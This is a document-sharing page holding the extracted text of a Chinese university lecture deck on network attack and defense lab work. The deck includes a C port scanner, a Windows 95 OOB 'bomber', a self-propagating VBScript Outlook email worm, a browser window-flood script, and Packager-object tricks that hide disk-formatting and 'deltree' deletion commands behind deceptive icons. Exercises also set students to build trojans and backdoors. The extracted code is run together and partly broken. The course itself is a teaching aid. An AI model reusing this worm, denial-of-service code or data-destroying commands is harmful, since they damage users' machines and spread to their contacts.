书签 分享 收藏 举报 版权申诉 / 46
上传文档赚钱

类型网络攻击与防御实例课件.ppt

  • 上传人(卖家):三亚风情
  • 文档编号:2758752
  • 上传时间:2022-05-24
  • 格式:PPT
  • 页数:46
  • 大小:959KB
  • 【下载声明】
    1. 本站全部试题类文档,若标题没写含答案,则无答案;标题注明含答案的文档,主观题也可能无答案。请谨慎下单,一旦售出,不予退换。
    2. 本站全部PPT文档均不含视频和音频,PPT中出现的音频或视频标识(或文字)仅表示流程,实际无音频或视频文件。请谨慎下单,一旦售出,不予退换。
    3. 本页资料《网络攻击与防御实例课件.ppt》由用户(三亚风情)主动上传,其收益全归该用户。163文库仅提供信息存储空间,仅对该用户上传内容的表现方式做保护处理,对上传内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!
    4. 请根据预览情况,自愿下载本文。本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
    5. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007及以上版本和PDF阅读器,压缩文件请下载最新的WinRAR软件解压。
    配套讲稿:

    如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。

    特殊限制:

    部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。

    关 键  词:
    网络 攻击 防御 实例 课件
    资源描述:

    1、一、扫描器程序设计一、扫描器程序设计要求具备网络攻防基本原理、C+编程技术、VBS脚本编程、基于TCP/IP的Win Scoket编程。这个扫描器相当简单,只需要有一定的C语言编程能力和Socket知识就可以完成。当然,这个简单的扫描器并不是真正意义上的端口扫描器,因为它给出的信息太少了,而且这种扫描会在目标机上留下大量的记录,有经验的管理员一看就知道自己正在受到攻击,而且可以马上追踪到扫描者。如果要进一步扫描出更多信息并隐蔽自己,需要用到许多复杂的扫描技术。Y 建立套接字 设置端口号 用 connect 与指 定 IP 地址连接 与端口请求连接 是否连接? 显示端口开启 显示端口关闭 取下一

    2、个端口 N #include /包含windows套接字函数#includestdio.h#pragma comment(lib,ws2_32) /将注释wsock32放置到lib文件中#include#includevoid main()WSADATA ws; /将ws的数据类型声明为WSADATASOCKET s;struct sockaddr_in addr; /系统保存套接字地址的结构体int g1,k;long g2;printf(请输入要监测最大的端口号n);scanf(%d,&k); /下面用connect与端口建立连接,如果可以连接表示端口开启,否则关闭for(int i=1;

    3、ik;i+) /循环1到k个端口g2=WSAStartup(0 x0101,&ws);s=socket(PF_INET,SOCK_STREAM,0); /创建套接字,TCP/IP协议,流Socketaddr.sin_family=PF_INET; /规定使用IPv4协议addr.sin_addr.s_addr=inet_addr(10.1.8.*); /指定为IP为10.1.8.*,实验时可以更改addr.sin_port=htons(i); /端口号if(s= =INVALID_SOCKET) break;/如果socket没有连接上,退出g1=connect(s,(struct socka

    4、ddr*)&addr,sizeof(addr); /建立连接,判断端口是否关闭if(g1!=0)printf(10.1.8.62:%i 端口关闭n,i); /指定的端口关闭WSACleanup();else printf(10.1.8.*:%i 端口开启n,i); /指定的端口开放closesocket(s); /关闭套接字 二、OOB网络炸弹攻击编程OOB(Out Of Band)是TCP/IP的一种传输模式,是早期Win95/NT的漏洞,攻击者向系统139端口传送0字节数据包时,Win系统自动恢复该数据碎片,导致系统资源耗尽,使机器出现蓝屏,以至死机。常见有:WinNuke、Voob等网络

    5、炸弹。该程序是用Visual C+60语言设计的,使用Scoket套接字的通信形式,利用数据包频繁的发送,造成接受方系统瘫痪。#include#include#include#pragma comment(lib,wsock32.lib)/*定义攻击目标计算机的IP地址*/char *IpAddr;int IpPort;/进攻端口135或137或139char *Msg= You are bombed!;/*在被攻击者计算机上显示You are bombed!字符串*/void Banner(void)/*被段显示攻击者信息*/printf(Windows95 OOB Bomber by ji

    6、aocang);int main(int argc,char *argv)/*开始定义变量*/struct sockaddr_in sin;WSADATA wsaData;SOCKET sd;Banner();/*显示攻击者信息*/printf(usage:OOB Ip Port 135);return 1; IpAddr=argv1;IpPort=atoi(argv2);/*初始化winsock*/if(WSAStartup(MAKEWORD(2,2),&wsaData)!=0)printf(init socket error!);return 1;IpAddr=argv1;IpPort=a

    7、toi(argv2);/*初始化winsock*/If(WSAStartup(0 x0101,&wsaData)/函数WSAStartup()初始化Windows Socket API,参数WAVES指定为winsock版本,参数wsadata指定为返回WSADATA的数据类型printf(“Init TCP/IP stack error!”);Return 1;if(wsaData.wVersion!=0 x0101)printf(Winsock version is incorrect);/*版本有错误,无法通信*/WSACleanup(); /函数WSACleanup()关闭Socket

    8、套接字/return 1; if(sd=socket(AF_INET,SOCK_STREAM,IPPROTO_IP)= =INVALID_SOCKET)printf(Create socket error!); return 1;/*连接到被攻击者的IP地址#/printf(connecte to 127.0.0.0:139);/*发送攻击字符*/if(send(sd,Msg,strlen(Msg),MSG_OOB)=SOCKET_ERROR)printf(send data error!);closesocket(sd);WSACleanup();return 1;/*关闭连接,释放资源*/

    9、closesocket(sd);/WSACleanup();/*提示printf(Bomb complete!);return 0;三、木马设计原理特洛伊木马(Trojan horse)是一种隐藏了具有攻击性的应用程序,与病毒程序不同,它不具备复制能力,其功能具有破坏性质。大部分木马采用C/S运行模式,当服务端在目标计算机上被运行后,打开一个特定的端口进行监听,当客户端向服务器发出连接请求时,服务器端的相应程序会自动运行,来应答客户机的请求。 黑客 目标主机 后门 连接被拒绝 连接成功 源程序如下:四、OutLook漏洞攻击程序设计网络邮箱病毒是目前常见的攻击手段之一,该编程要求学生具备以下几

    10、点基础:1VBS脚本语言、Javascript脚本语言、网页编程、Windows系统脚本语言。2 具备网络编程知识,Windows网络安全设置,网络传输构成, Windows注册表设置,请参照信息系统安全与对抗技术实验教程(罗森林、高平)OutLook攻击程序是由VBScript编写的,其自我复制的原理基本上是利用程序将本身的脚本内容复制一份到一个临时文件,然后再在传播的环节将其作为附件发送出去。我们看看脚本是怎么样完成这个功能的。 Set so=CreateObject(Scripting.FileSystemObject) /是创建一个文件系统对象so.GetFile(WScript.Sc

    11、riptFullName).Copy(C:dateiname.vbs) /打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到c盘根目录下dateiname.vbs这个文件。 通过OutLook传播的电子邮件病毒都是向地址簿中存储的电子邮件地址发送内同相同的脚本附件完成的。Set objOA=Wscript.CreateObject (Outlook.Application)/创建一个OUTLOOK应用的对象 Set objMapi=objOA.GetNameSpace (MAPI

    12、)/取得MAPI名字空间 Fori=1to objMapi.AddressLists.Count /遍历地址簿 SetobjAddList=objMapi.AddressL is ts (i)For j=1 To objAddList. AddressEnt ries.Count Set objMail=objOA.CreateItem(0) objMail.Recipients.Add(objAddList.AddressEntries(j)/取得邮件地址,收件人 objMail.Subject = 你好! objMail.Body =这次给你的附件是我的新文档! objMail.Attac

    13、hments.Add(“c:virus.vbs)/把自己作为附件扩散出去 objMail.Send/发送邮件 Next Next .五、网络炸弹编程设计打开outlook express:进入发信编辑例:网页炸弹,该程序保存在htm为后缀的文件中,放在邮件的附件中,当双击它时,出现无穷网页窗口,将系统资源耗尽。 no 使用Java脚本function openwindow() for(i=0;i3;i+) 这里可以控制窗口的个数window.open(http:/10.0.0.50) 例:网络炸弹,如果将电子邮件夹带在word文挡中,激活炸弹方法如下:建立一个新文件-执行”插入-对象”-插入”

    14、包”对象-确定start.exe/m format a:/q/autotest/uformat: 格式化a:磁盘/q:快速格式化u:强制执行autotest:自动执行例:txt炸弹(1)建立一个仅有简单字符的文本文件,任意取文件名,如在记事本建立一个空格文件。(2)打开写字板文档,将该文件拖入写字板文档中。也可以从写字板的“插入”“对象”,弹出”插入对象”的对话框中选择“从文件创建”然后在“浏览”按钮选择要插入的文件。(3)调用对象包选中该插入的图标,单击右键,选择“对象包对象”-“编辑对象包”。在“对象包”的对话栏中选择“编辑”-“命令行”可以输入以下命令。Format a:/q/autot

    15、est/ustart.exe/m format a:/q/autotest/u(win98系统)deltree /y a:*.* c:*.*deltree /y c:windowssystem*.c(4)修改外观单击“插入图标”-从中任选一个图标。这里要求选择一个具有欺骗性的图标,能够使用户上当而被攻击。比如:将下载音乐的图标加入信件文档中,当双击时则系统被破坏。输入命令形式如下:同时可以给包建立一个文件名,这样更有诱惑性,方法:“编辑”-“标签”-在对话框中输入所要更该的文件名。然后将包拖放到桌面上,可以作为附件发出,或嵌入文档中。防治:在怀疑的包上单击右键,选“编辑”,即可看到输入的命令。

    16、六、实验要求实验目的实验目的: 掌握有关网络攻击与防护的基本原理,请参照有关书籍。 了解常用网络攻击软件:扫描器、木马、密码破解器等。实验要求:实验要求: 利用脚本语言、C语言设计网络攻击程序:漏洞扫描器、木马、邮箱攻击程序等。通过WIN系统,结合日志分析、入侵检测分析,利用防火墙技术和WIN安全审核工具,加固自己的网络与计算机系统。通过课堂实验指导,了解程序设计思想与基本方法,要求学生在课余查阅图书资料,根据实验范例,对实验内容举一反三,独立设计软件。具体如下:了解信息收集的原理和扫描器的概念,区别端口扫描器与漏洞扫描器,它们的应用场合及在攻防系统中的作用。掌握常见的扫描器软件使用方法,如:

    17、SATAN、CIS、SuperScan。要求学生在上机时根据自己使用的扫描器软件对实验室网络系统进行漏洞扫描并分析扫描的参数与结果,将其分析报告详细地写出来,并解释其原因及解决的措施。对扫描的结果作出正确的分析,根据分析评估网络系统安全性,必要时关闭危险端口,合理配置计算机系统。根据的实例,通过编程要求学生掌握端口扫描器的设计方法。了解常见的监听软件使用方法,要求学生在上机时根据自己使用的监听软件对系统进行被动攻击所得的参数与结果进行分析,并按照其分析结果用实验报告形式详细地写出来,要求使用网络刺客sniffit、snoop软件。 掌握突破TCP/IP过滤/防火墙进入内网的方法,掌握TCPSo

    18、cket数据转发功能,会使用相关的攻击软件,如何连接对方服务器,写出其步骤。要求学生理解和掌握如何突破防火墙进入对方系统方法,通过实验报告形式将其论述详细地写出来,具体要求:概述,攻击原理,使用软件,攻击效果(注意要遵守国家法律,不要破坏对方资源,仅进入系统即可),攻击过程流程图。入侵监测技术是防火墙技术合理而有效的补充,要求结合漏洞扫描器的使用,通过端口的监测,收集关键信息,查看系统日志,分析其信息,检查系统中是否有违反安全策略的行为和遭到袭击的迹象。利用网络防火墙、端口安全设置、日志设置及入侵监测策略的技术,最有效地加固计算机系统,通过实验结合上述技术到达最佳效果,要求写出分析报告、具体设

    19、置与安全建议。除本书所介绍的Windows系统漏洞外,要求学生更深入一层地了解其它漏洞形式,它们的危害是什么?请认真总结和归纳其漏洞类型、漏洞危害、漏洞攻击、漏洞防范。结合拒绝攻击实例分析,要求学生自学smurf攻击方法,独立设计一个具有ICMP响应的网络阻塞攻击程序。独立设计一个简单的web攻击系统,要求具有欺骗形式和攻击效果。结合后门攻击实例,要求学生分析程序设计思想,独立设计一个具有开启某端口功能和密码的后门程序。独立设计木马程序,结合SYN flood攻击实例中如何修改注册表加载自己的程序的方法和木马程序实例中隐藏任务栏的方法,要求具有自动加载、隐藏任务栏、能够控制系统的木马程序。根据

    20、网络系统安全策略,要求学生结合漏洞扫描器的使用,通过端口的监测,收集关键信息,查看系统日志,分析其信息,检查系统中是否有违反安全策略的行为和遭到袭击的迹象。利用网络防火墙、端口安全设置、日志设置及入侵监测策略的技术,最有效地加固计算机系统,同时结合Windows系统设置、Internet explore安全设置、Outlook Express的安全优化设计等方法。通过实验结合上述技术到达到网络体系安全防护的最佳效果,要求写出分析报告、具体设置与安全建议。七、实验报告要求实验报告要求l1开放实验报告版型,选修实验的不要求l2选修实验报告格式l3实验报告格式一l4实验报告格式二八、参考资料参考资料 http:/中国程序员网http:/VC+专业网站http:/网络安全论坛http:/hacker-黑客防线http:/http:/红客谢谢同学们!答疑G

    展开阅读全文
    提示  163文库所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。
    关于本文
    本文标题:网络攻击与防御实例课件.ppt
    链接地址:https://www.163wenku.com/p-2758752.html

    Copyright@ 2017-2037 Www.163WenKu.Com  网站版权所有  |  资源地图   
    IPC备案号:蜀ICP备2021032737号  | 川公网安备 51099002000191号


    侵权投诉QQ:3464097650  资料上传QQ:3464097650
       


    【声明】本站为“文档C2C交易模式”,即用户上传的文档直接卖给(下载)用户,本站只是网络空间服务平台,本站所有原创文档下载所得归上传人所有,如您发现上传作品侵犯了您的版权,请立刻联系我们并提供证据,我们将在3个工作日内予以改正。

    163文库